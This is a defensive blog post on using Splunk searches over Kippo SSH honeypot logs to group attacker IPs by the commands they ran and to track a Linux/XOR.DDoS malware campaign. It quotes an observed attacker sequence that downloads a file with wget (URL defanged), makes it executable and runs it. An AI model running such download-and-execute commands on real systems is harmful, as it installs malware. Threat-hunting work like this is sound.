Identifying Honeypot Attackers Infrastructure in Splunk

18 March 2015

In this post, we'll cover some searches that will help us identify the infrastructure that the attackers are using. We'll do this by grouping the attackers together based on the commands they enter during each session. By doing this, we can assume that the attacking IP addresses are somehow used by the same attackers, or they are using the same C2 infrastructure and tactics as other groups do.

We'll start with the search that will show us the attackers using the same commands:

sourcetype=kippojson [ search sourcetype=kippojson command=* | stats count by session | fields session ] | transaction session | nomv command | stats values(src_ip) dc(src_ip) as dc by command | sort - dc | fields - dc

Breaking the above search down, first we specify we want to look in the kippojson sourcetype, next we are running a subsearch to give us only the sessions that have a command entered in it. Next, we are grouping the events together that have the same session identifier by running transaction session. Since in each session there can be multiple commands, we need to group them into one field so we can see if that matches other sessions, we do this by using the nomv command command. Next, we get the values of src_ip, and the distinct number of src_ip's (this is used to sort in descending order later on), then we are grouping them by the commands. Lastly, we sort based on the number of attacker IP addresses, and remove that field, since it isn't important.

Since, the number of IP's for some of the command groups are pretty crazy, I thought I would illustrate the top commands per number of IP's to make it easier to read:

Commands Count
free -m
ps -x
uname 57
id 56
wget hxxp://
ls -la /var/run/sftp/pid
chmod +x 8002
wget hxxp:// 10
wget hxxp:// 10
wget hxxp:// 10

Looking at the results, we can see the most common group of commands don't really provide us that much value. The 169 IP's running free -m; ps -x; uname are most likely doing some sort of recon, and that's it, so pretty boring stuff.

However, the fourth group of commands down show some interesting stuff.

wget hxxp:// 
ls -la /var/run/sftp/pid 
chmod +x 8002 

The attackers are grabbing malware from, making it executable, and then running it. There's about 12 distinct IP addresses running the same set of commands, which are:

Using a quick little script, we can identify where these IP's are located:


The malware they were downloading is of the Linux/XOR.DDoS family, used by the Hee Thai campaign which FireEye did a write-up on. We see this malware being downloaded all the time on our honeypots as well, I'd say a good 20% of the malware we get is a variant of that malware.

Moving on, we can try to see if these IP's were distributing other malware in the past:

sourcetype=kippojson [ search sourcetype=kippojson src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= | stats count by session | fields session ] | transaction session | stats count by url

Turns out they did, and the other files they downloaded were:

Not knowing these were part of the Hee Thai campaign, we would begin doing some research on these IP's. A good start would be VirusTotal, and their IP report here, which gives us the passive DNS records seen, as well as URL's, and malware downloaded from this IP previously.

Another thing we can do knowing the URL's where they download the malware from, is seeing who else is downloading this malware. Since our initial search was only looking for the same commands, this search will only look for the malware, in any command:

sourcetype=kippojson [ search sourcetype=kippojson url= OR url= OR url= OR url= OR url= OR url= | stats count by session | fields session ] | transaction session | stats count by src_ip

The above search will give us these IP's:

So, we just gained an additional 8 IP addresses that are distributing this malware. We can add these to our list of IOC's and start doing some investigation into the new ones.

One last bit of interesting information, which isn't new, but, just confirming in our logs. So, with the Hee Thai campaign, they use a subnet to scan the internet (, which gathers the credentials for the system, they then use other IP addresses to do the actual logging in.

I was able to validate this by looking at who logged into my box with only the correct password, and no other attempts. The first one I found was this IP,, he logged into my box with my password and no other guesses. Granted, it's an easy password, however, if we look at the other times we see this guy...

sourcetype=kippojson [ search sourcetype=kippojson src_ip="" | stats count by session | fields session ] | transaction session | stats count by eventtype

The above search looks for all the sessions from and is counting the eventtypes, which are either "login_success" or "login_attempt", and we get 21 login_success'es, with no failures, pretty interesting, right?